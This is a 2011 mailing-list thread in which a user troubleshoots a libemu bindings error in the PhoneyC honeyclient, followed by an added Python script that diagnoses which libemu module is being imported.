libemu.Emulator not found

Marta

May 15, 2011, 2:16:00 PM
to phoneyc
Hi!

I've been nearly all day fighting with this problem, searching
everywhere for similar problems, repeating the steps... but no luck
for me.

I've followed all instructions, and in both modes (Option 1 & option
2). Heapspray attacks are correctly detected and shellcodes are
detected but can't be executed.

libemu -> trunk version (0.2.0)
curl -> 7.19.7
python -> 2.6.5
(Ubuntu Server 10.04)

Could you help me with this? I'm a beginner with honeyclients.

Thanks for your time and patience.

I leave here two execution samples:

*Shellcode can't be executed*:
sudo python ./phoneyc.py file://samples/4158.html
[2011-05-15 20:01:49] [ALERT] NeoTracePro.TraceTarget overflow in arg0
Log written into: log/ad5048081277127857aad08e0bfd5e55

====================================
|--------AID:1----------
|ATYPE:ALERT_SHELLCODE
|MESSAGE:Shellcode Detected!
|MISC:{}
|LENGTH:752
|SHELLCODE:
[shellcode hex dump omitted]
|Now run it:
Traceback (most recent call last):
File "./phoneyc.py", line 194, in <module>
report(alerts)
File "./phoneyc.py", line 119, in report
shellcoderesult = alert.run_shellcode()
File "/home/marta/phoneyc_v0_1_rev1631/lib/python/hcalert.py", line
31, in run_shellcode
return e.run_shellcode(self.shellcode,self.offset)
AttributeError: 'libemu.Emulator' object has no attribute
'run_shellcode'

*Heapspray attack detected ok*
sudo python ./phoneyc.py file://samples/Pps.html
[2011-05-15 19:59:35] [ALERT] PPStream (PowerPlayer.dll 2.0.1.3829)
ActiveX Remote Overflow Exploit in Logo property
Log written into: log/3a47adf41c41079156ee8c0fe439c70e

====================================
|--------AID:1----------
|ATYPE:ALERT_HEAPSPRAY
|MESSAGE:Heapspray Detected!
|HIT:3
|MEMUSAGE:524044
|LENGTH:524044
|ENTROPY:0.0
|MISC:{'sledge_char': '\x90', 'sec_char_cnt': 0, 'sledge_cnt': 524044,
'sec_char': '\x00'}

====================================
|--------AID:2----------
|ATYPE:ALERT_HEAPSPRAY
|MESSAGE:Heapspray Detected!
|HIT:400
|MEMUSAGE:209699200
|LENGTH:524248
|ENTROPY:0.00735793427204
|MISC:{'sledge_char': '\x90', 'sec_char_cnt': 12, 'sledge_cnt':
524045, 'sec_char': '\x8b'}


Angelo Dell'Aera

May 17, 2011, 4:00:21 AM
to pho...@googlegroups.com
On Sun, 15 May 2011 11:16:00 -0700 (PDT)
Marta <marta.m...@gmail.com> wrote:

> Hi!
>
> I've been nearly all day fighting with this problem, searching
> everywhere for similar problems, repeating the steps... but no luck
> for me.

[..]

> Traceback (most recent call last):
> File "./phoneyc.py", line 194, in <module>
> report(alerts)
> File "./phoneyc.py", line 119, in report
> shellcoderesult = alert.run_shellcode()
> File "/home/marta/phoneyc_v0_1_rev1631/lib/python/hcalert.py", line
> 31, in run_shellcode
> return e.run_shellcode(self.shellcode,self.offset)
> AttributeError: 'libemu.Emulator' object has no attribute
> 'run_shellcode'

Seems like you have compiled libemu with its own Python bindings
(--enable-python-bindings). Please try reinstalling libemu without
enabling this feature and then reinstall PhoneyC modules.

Let me know if everything works fine after that.

Ciao,

--

Angelo Dell'Aera 'buffer'
Antifork Research, Inc. http://buffer.antifork.org
Metro Olografix
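A small diagnostic for the situation Angelo describes, added here as an example; it is not code from the thread, from PhoneyC or from libemu. Two different extension modules can both be importable as `libemu`: the bindings libemu builds for itself when configured with --enable-python-bindings, and the ones PhoneyC installs. Whichever comes first on sys.path wins, and the traceback above shows what happens when it is libemu's own: the `Emulator` class exists but has no `run_shellcode`, the method hcalert.py calls. The script lists every sys.path entry that holds something named `libemu`, imports the winner and reports whether it is usable by PhoneyC. The function names (`candidate_locations`, `check_bindings`, `diagnose`, `verdict`) are my own, and it assumes `run_shellcode` is the only method PhoneyC needs, since that is the only one the traceback mentions.

```python
# Added diagnostic (not part of the thread, PhoneyC or libemu): which
# 'libemu' module does Python actually import, and does it carry the
# Emulator.run_shellcode() method that PhoneyC's hcalert.py calls?
import importlib
import os
import sys

# Assumption: the only method PhoneyC needs on libemu.Emulator is the one
# named in the traceback. Extend this tuple if your hcalert.py calls more.
REQUIRED_METHODS = ("run_shellcode",)


def candidate_locations(module_name="libemu", search_path=None):
    """Return every sys.path entry holding something importable as module_name.

    More than one hit means two installs shadow each other; the first hit is
    the one 'import libemu' resolves to.
    """
    search_path = sys.path if search_path is None else search_path
    hits = []
    for entry in search_path:
        directory = entry or os.getcwd()      # '' on sys.path means the cwd
        if not os.path.isdir(directory):
            continue
        for name in sorted(os.listdir(directory)):
            # libemu.so, libemu.py, libemu/ ... all share the stem 'libemu'
            if name.split(".")[0] == module_name:
                hits.append(os.path.join(directory, name))
    return hits


def check_bindings(module):
    """Inspect an already-imported module object claiming to be libemu.

    An Emulator class that lacks run_shellcode is the signature of libemu's
    own bindings rather than PhoneyC's, which is exactly the AttributeError
    in the traceback.
    """
    emulator = getattr(module, "Emulator", None)
    missing = [m for m in REQUIRED_METHODS
               if emulator is None or not callable(getattr(emulator, m, None))]
    return {
        "file": getattr(module, "__file__", "<built-in or namespace>"),
        "has_emulator": emulator is not None,
        "missing": missing,
        "phoneyc_ready": emulator is not None and not missing,
        "error": None,
    }


def diagnose(module_name="libemu"):
    """Import module_name and inspect it; a missing module is reported, not raised."""
    try:
        module = importlib.import_module(module_name)
    except ImportError as exc:
        return {"file": None, "has_emulator": False,
                "missing": list(REQUIRED_METHODS), "phoneyc_ready": False,
                "error": str(exc)}
    return check_bindings(module)


def verdict(report):
    """Turn a diagnose()/check_bindings() report into a one-line action."""
    if report["error"]:
        return "no 'libemu' module importable: install PhoneyC's modules"
    if report["phoneyc_ready"]:
        return "PhoneyC bindings found at %s" % report["file"]
    return ("%s looks like libemu's own bindings (missing %s): rebuild libemu "
            "without --enable-python-bindings, then reinstall PhoneyC modules"
            % (report["file"], ", ".join(report["missing"])))


if __name__ == "__main__":
    for hit in candidate_locations():
        print("candidate:", hit)
    print(verdict(diagnose()))
```

Run it with the same interpreter PhoneyC uses (here `sudo python`, since the root environment may have a different sys.path from the user's). Two candidates in the listing, with the first one flagged as lacking `run_shellcode`, confirms the shadowing; after rebuilding libemu without the flag and reinstalling PhoneyC's modules, only one candidate should remain and the verdict should report it as ready.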
